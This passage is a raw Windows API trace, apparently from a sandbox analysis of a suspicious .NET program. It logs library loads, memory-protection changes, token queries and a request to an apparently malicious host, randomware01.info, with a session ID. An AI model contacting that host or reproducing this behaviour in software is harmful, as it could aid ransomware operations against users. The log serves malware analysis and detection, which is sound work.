BaseAddress=0x41e54c*=0x77231000, NumberOfBytesToProtect=0x41e550, OldAccessProtection=0x41e584*=0x4) returned 0x0 [0085.377] GetProcAddress (hModule=0x77230000, lpProcName=0x73) returned 0x77233ab2 [0085.377] SysReAllocStringLen (in: pbstr=0x41e78c*=0x0, psz="verifier.dll", len=0xc | out: pbstr=0x41e78c*="verifier.dll") returned 1 [0085.377] CharLowerBuffW (in: lpsz="verifier.dll", cchLength=0xc | out: lpsz="verifier.dll") returned 0xc [0085.377] GetModuleHandleW (lpModuleName="verifier.dll") returned 0x0 [0085.379] SysReAllocStringLen (in: pbstr=0x41e630*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41e630*="kernel32.dll") returned 1 [0085.379] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.379] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0085.379] GetLastError () returned 0x0 [0085.382] GetProcAddress (hModule=0x76d30000, lpProcName="GetProductInfo") returned 0x76d51721 [0085.383] FreeLibrary (hLibModule=0x76d30000) returned 1 [0085.384] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=11, lpWideCharStr=0x41d714, cchWideChar=2047 | out: lpWideCharStr="SspiCli.dllA흄A盃흌A") returned 11 [0085.384] SysReAllocStringLen (in: pbstr=0x41e718*=0x0, psz="SspiCli.dll", len=0xb | out: pbstr=0x41e718*="SspiCli.dll") returned 1 [0085.384] CharLowerBuffW (in: lpsz="SspiCli.dll", cchLength=0xb | out: lpsz="sspicli.dll") returned 0xb [0085.385] LoadLibraryExA (lpLibFileName="SspiCli.dll", hFile=0x0, dwFlags=0x0) returned 0x757a0000 [0085.385] GetLastError () returned 0x0 [0085.385] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e704*=0x757b00ac, NumberOfBytesToProtect=0x41e708, NewAccessProtection=0x4, OldAccessProtection=0x41e73c | out: BaseAddress=0x41e704*=0x757b0000, NumberOfBytesToProtect=0x41e708, OldAccessProtection=0x41e73c*=0x20) returned 0x0 [0085.385] GetCurrentProcess () returned 0xffffffff [0085.385] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e704*=0x757b00ac, NumberOfBytesToProtect=0x41e708, NewAccessProtection=0x20, OldAccessProtection=0x41e73c | out: BaseAddress=0x41e704*=0x757b0000, NumberOfBytesToProtect=0x41e708, OldAccessProtection=0x41e73c*=0x4) returned 0x0 [0085.386] GetCurrentProcess () returned 0xffffffff [0085.386] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e704*=0x757b00b4, NumberOfBytesToProtect=0x41e708, NewAccessProtection=0x4, OldAccessProtection=0x41e73c | out: BaseAddress=0x41e704*=0x757b0000, NumberOfBytesToProtect=0x41e708, OldAccessProtection=0x41e73c*=0x20) returned 0x0 [0085.386] GetCurrentProcess () returned 0xffffffff [0085.386] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e704*=0x757b00b4, NumberOfBytesToProtect=0x41e708, NewAccessProtection=0x20, OldAccessProtection=0x41e73c | out: BaseAddress=0x41e704*=0x757b0000, NumberOfBytesToProtect=0x41e708, OldAccessProtection=0x41e73c*=0x4) returned 0x0 [0085.387] GetProcAddress (hModule=0x757a0000, lpProcName="InitSecurityInterfaceW") returned 0x757c1314 [0085.387] GetProcAddress (hModule=0x757a0000, lpProcName="InitSecurityInterfaceA") returned 0x757c12ec [0085.387] GetProcAddress (hModule=0x77230000, lpProcName=0x6f) returned 0x772337ad [0085.539] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=10, lpWideCharStr=0x41d930, cchWideChar=2047 | out: lpWideCharStr="RPCRT4.dll\r") returned 10 [0085.539] SysReAllocStringLen (in: pbstr=0x41e934*=0x0, psz="RPCRT4.dll", len=0xa | out: pbstr=0x41e934*="RPCRT4.dll") returned 1 [0085.539] CharLowerBuffW (in: lpsz="RPCRT4.dll", cchLength=0xa | out: lpsz="rpcrt4.dll") returned 0xa [0085.540] LoadLibraryExA (lpLibFileName="RPCRT4.dll", hFile=0x0, dwFlags=0x0) returned 0x76af0000 [0085.540] GetLastError () returned 0x0 [0085.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e920*=0x76b00328, NumberOfBytesToProtect=0x41e924, NewAccessProtection=0x4, OldAccessProtection=0x41e958 | out: BaseAddress=0x41e920*=0x76b00000, NumberOfBytesToProtect=0x41e924, OldAccessProtection=0x41e958*=0x20) returned 0x0 [0085.540] GetCurrentProcess () returned 0xffffffff [0085.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e920*=0x76b00328, NumberOfBytesToProtect=0x41e924, NewAccessProtection=0x20, OldAccessProtection=0x41e958 | out: BaseAddress=0x41e920*=0x76b00000, NumberOfBytesToProtect=0x41e924, OldAccessProtection=0x41e958*=0x4) returned 0x0 [0085.541] GetCurrentProcess () returned 0xffffffff [0085.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e920*=0x76b00330, NumberOfBytesToProtect=0x41e924, NewAccessProtection=0x4, OldAccessProtection=0x41e958 | out: BaseAddress=0x41e920*=0x76b00000, NumberOfBytesToProtect=0x41e924, OldAccessProtection=0x41e958*=0x20) returned 0x0 [0085.541] GetCurrentProcess () returned 0xffffffff [0085.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e920*=0x76b00330, NumberOfBytesToProtect=0x41e924, NewAccessProtection=0x20, OldAccessProtection=0x41e958 | out: BaseAddress=0x41e920*=0x76b00000, NumberOfBytesToProtect=0x41e924, OldAccessProtection=0x41e958*=0x4) returned 0x0 [0085.542] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringBindingComposeW") returned 0x76b11420 [0085.542] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingFromStringBindingW") returned 0x76b111b9 [0085.542] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingSetAuthInfoExW") returned 0x76b1169d [0085.542] GetProcAddress (hModule=0x76af0000, lpProcName="RpcBindingSetOption") returned 0x76b149b6 [0085.543] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0085.545] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d874, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll뛤m?A䘨盤┷示?A⹼盃Љ") returned 12 [0085.545] SysReAllocStringLen (in: pbstr=0x41e878*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x41e878*="ADVAPI32.dll") returned 1 [0085.545] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0085.545] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0085.545] GetLastError () returned 0x0 [0085.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711520, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.546] GetCurrentProcess () returned 0xffffffff [0085.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711520, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.546] GetCurrentProcess () returned 0xffffffff [0085.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711540, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.547] GetCurrentProcess () returned 0xffffffff [0085.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711540, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771175c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.547] GetCurrentProcess () returned 0xffffffff [0085.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771175c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.548] GetCurrentProcess () returned 0xffffffff [0085.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711768, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.548] GetCurrentProcess () returned 0xffffffff [0085.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711768, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.548] GetCurrentProcess () returned 0xffffffff [0085.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117b8, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.549] GetCurrentProcess () returned 0xffffffff [0085.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117b8, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.549] GetCurrentProcess () returned 0xffffffff [0085.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117bc, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.549] GetCurrentProcess () returned 0xffffffff [0085.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117bc, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.550] GetCurrentProcess () returned 0xffffffff [0085.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117c8, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.550] GetCurrentProcess () returned 0xffffffff [0085.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117c8, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.550] GetCurrentProcess () returned 0xffffffff [0085.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117d0, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.551] GetCurrentProcess () returned 0xffffffff [0085.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x777117d0, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.551] GetCurrentProcess () returned 0xffffffff [0085.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771180c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.551] GetCurrentProcess () returned 0xffffffff [0085.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771180c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.552] GetCurrentProcess () returned 0xffffffff [0085.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771182c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.552] GetCurrentProcess () returned 0xffffffff [0085.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x7771182c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.552] GetCurrentProcess () returned 0xffffffff [0085.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711860, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0085.553] GetCurrentProcess () returned 0xffffffff [0085.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x77711860, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x77711000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0085.553] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0085.554] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpSetTimeouts") returned 0x7489d143 [0085.554] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpSetTimeoutsW") returned 0x0 [0085.554] WinHttpSetTimeouts (hInternet=0x73d048, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0085.555] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x748a257e [0085.555] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x41eb48 | out: pProxyConfig=0x41eb48) returned 1 [0085.555] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d93c, cchWideChar=2047 | out: lpWideCharStr="IPHLPAPI.DLLᮤ²ADVAPI32.dll冒瞔?A𥳐矆\x80") returned 12 [0085.555] SysReAllocStringLen (in: pbstr=0x41e940*=0x0, psz="IPHLPAPI.DLL", len=0xc | out: pbstr=0x41e940*="IPHLPAPI.DLL") returned 1 [0085.555] CharLowerBuffW (in: lpsz="IPHLPAPI.DLL", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0085.556] LoadLibraryExA (lpLibFileName="IPHLPAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x74810000 [0086.068] GetLastError () returned 0x0 [0086.069] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x74811140, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x4, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x20) returned 0x0 [0086.070] GetCurrentProcess () returned 0xffffffff [0086.070] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x74811140, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x20, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x4) returned 0x0 [0086.070] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x748111bc, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x4, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x20) returned 0x0 [0086.071] GetCurrentProcess () returned 0xffffffff [0086.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x748111bc, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x20, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x4) returned 0x0 [0086.071] GetCurrentProcess () returned 0xffffffff [0086.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x748111c8, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x4, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x20) returned 0x0 [0086.071] GetCurrentProcess () returned 0xffffffff [0086.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e92c*=0x748111c8, NumberOfBytesToProtect=0x41e930, NewAccessProtection=0x20, OldAccessProtection=0x41e964 | out: BaseAddress=0x41e92c*=0x74811000, NumberOfBytesToProtect=0x41e930, OldAccessProtection=0x41e964*=0x4) returned 0x0 [0086.072] GetProcAddress (hModule=0x74810000, lpProcName="GetAdaptersAddresses") returned 0x74816a4d [0086.490] GetProcAddress (hModule=0x74810000, lpProcName="GetBestInterfaceEx") returned 0x74813f41 [0086.491] GetProcAddress (hModule=0x772f0000, lpProcName="SHGetValueA") returned 0x772fcf09 [0086.492] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=9, lpWideCharStr=0x41d6e4, cchWideChar=2047 | out: lpWideCharStr="ntdll.dll") returned 9 [0086.492] SysReAllocStringLen (in: pbstr=0x41e6e8*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41e6e8*="ntdll.dll") returned 1 [0086.492] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0086.492] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c40000 [0086.493] GetLastError () returned 0x0 [0086.493] GetProcAddress (hModule=0x77c40000, lpProcName="RtlConvertSidToUnicodeString") returned 0x77c7aec2 [0086.494] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0086.494] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] ResetEvent (hEvent=0xb8) returned 1 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] ResetEvent (hEvent=0xb8) returned 1 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] GetCurrentThreadId () returned 0xba4 [0086.495] SetEvent (hEvent=0xbc) returned 1 [0086.495] SetEvent (hEvent=0xb8) returned 1 [0086.495] CloseHandle (hObject=0x37c) returned 1 [0086.495] FreeLibrary (hLibModule=0x77c40000) returned 1 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] ResetEvent (hEvent=0xb8) returned 1 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] ResetEvent (hEvent=0xb8) returned 1 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] GetCurrentThreadId () returned 0xba4 [0086.865] SetEvent (hEvent=0xbc) returned 1 [0086.865] SetEvent (hEvent=0xb8) returned 1 [0086.865] CloseHandle (hObject=0x384) returned 1 [0086.875] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariable") returned 0x0 [0086.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableW") returned 0x76d41b48 [0086.878] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x41e3a0, nSize=0x90 | out: lpBuffer="A뮜猃쁭璩nnn⫬猸왣뮜猃A㋄瓶￿￿捆œ掷œ뽘￿⫬猸疽璡썟礐猂⫬猸\x02") returned 0x0 [0086.878] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x41e3a0, nSize=0x90 | out: lpBuffer="A뮜猃쁭璩nnn⫬猸왣뮜猃A㋄瓶￿￿捆œ掷œ뽘￿⫬猸疽璡썟礐猂⫬猸\x02") returned 0x0 [0086.881] SysReAllocStringLen (in: pbstr=0x41dccc*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41dccc*="kernel32") returned 1 [0086.881] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0086.881] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0086.887] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0086.889] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0086.916] EtwEventRegister () returned 0x0 [0086.918] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0087.190] EtwEventRegister () returned 0x0 [0087.257] SysReAllocStringLen (in: pbstr=0x41d19c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x41d19c*="mscorrc.dll") returned 1 [0087.257] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0087.257] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x0 [0087.264] GetLastError () returned 0x2 [0087.264] SetLastError (dwErrCode=0x2) [0087.264] SysReAllocStringLen (in: pbstr=0x41d19c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x41d19c*="mscorrc.dll") returned 1 [0087.264] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0087.265] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x0 [0087.265] GetLastError () returned 0x2 [0087.265] SetLastError (dwErrCode=0x2) [0087.265] SysReAllocStringLen (in: pbstr=0x41d19c*=0x0, psz="mscorrc.dll", len=0xb | out: pbstr=0x41d19c*="mscorrc.dll") returned 1 [0087.265] CharLowerBuffW (in: lpsz="mscorrc.dll", cchLength=0xb | out: lpsz="mscorrc.dll") returned 0xb [0087.265] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll", hFile=0x0, dwFlags=0x2) returned 0x1070001 [0087.283] GetLastError () returned 0x0 [0087.412] SysReAllocStringLen (in: pbstr=0x41cbe4*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41cbe4*="ntdll.dll") returned 1 [0087.412] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0087.412] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0087.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e814 | out: TokenHandle=0x41e814*=0x390) returned 1 [0087.418] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e824 | out: TokenHandle=0x41e824*=0x384) returned 1 [0087.432] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0087.433] SetEvent (hEvent=0x248) returned 1 [0087.463] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpGetProxyForUrl") returned 0x7489d5dc [0087.464] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpGetProxyForUrlW") returned 0x0 [0087.464] WinHttpGetProxyForUrl (in: hSession=0x73d048, lpcwszUrl="http://randomware01.info/?gen&session-id=a2eefc23-dab6-4e6f-8402-1fc84b478e68", pAutoProxyOptions=0x41ea58, pProxyInfo=0x41eac8 | out: pProxyInfo=0x41eac8) returned 0 [0087.473] GetProcAddress (hModule=0x76af0000, lpProcName="RpcAsyncInitializeHandle") returned 0x76ba020e [0087.473] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=40, lpWideCharStr=0x41d71c, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L1-1-0.dll") returned 40 [0087.473] SysReAllocStringLen (in: pbstr=0x41e720*=0x0, psz="API-MS-WIN-Service-Management-L1-1-0.dll", len=0x28 | out: pbstr=0x41e720*="API-MS-WIN-Service-Management-L1-1-0.dll") returned 1 [0087.473] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l1-1-0.dll") returned 0x28 [0087.473] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0087.474] GetLastError () returned 0x0 [0087.474] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e70c*=0x76d11074, NumberOfBytesToProtect=0x41e710, NewAccessProtection=0x4, OldAccessProtection=0x41e744 | out: BaseAddress=0x41e70c*=0x76d11000, NumberOfBytesToProtect=0x41e710, OldAccessProtection=0x41e744*=0x20) returned 0x0 [0087.475] GetCurrentProcess () returned 0xffffffff [0087.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e70c*=0x76d11074, NumberOfBytesToProtect=0x41e710, NewAccessProtection=0x20, OldAccessProtection=0x41e744 | out: BaseAddress=0x41e70c*=0x76d11000, NumberOfBytesToProtect=0x41e710, OldAccessProtection=0x41e744*=0x4) returned 0x0 [0087.475] GetCurrentProcess () returned 0xffffffff [0087.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e70c*=0x76d11088, NumberOfBytesToProtect=0x41e710, NewAccessProtection=0x4, OldAccessProtection=0x41e744 | out: BaseAddress=0x41e70c*=0x76d11000, NumberOfBytesToProtect=0x41e710, OldAccessProtection=0x41e744*=0x20) returned 0x0 [0087.476] GetCurrentProcess () returned 0xffffffff [0087.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e70c*=0x76d11088, NumberOfBytesToProtect=0x41e710, NewAccessProtection=0x20, OldAccessProtection=0x41e744 | out: BaseAddress=0x41e70c*=0x76d11000, NumberOfBytesToProtect=0x41e710, OldAccessProtection=0x41e744*=0x4) returned 0x0 [0087.476] GetProcAddress (hModule=0x76d10000, lpProcName="OpenSCManagerW") returned 0x76d163ad [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] ResetEvent (hEvent=0xb8) returned 1 [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] ResetEvent (hEvent=0xb8) returned 1 [0087.477] GetCurrentThreadId () returned 0xba4 [0087.477] GetCurrentThreadId () returned 0xba4 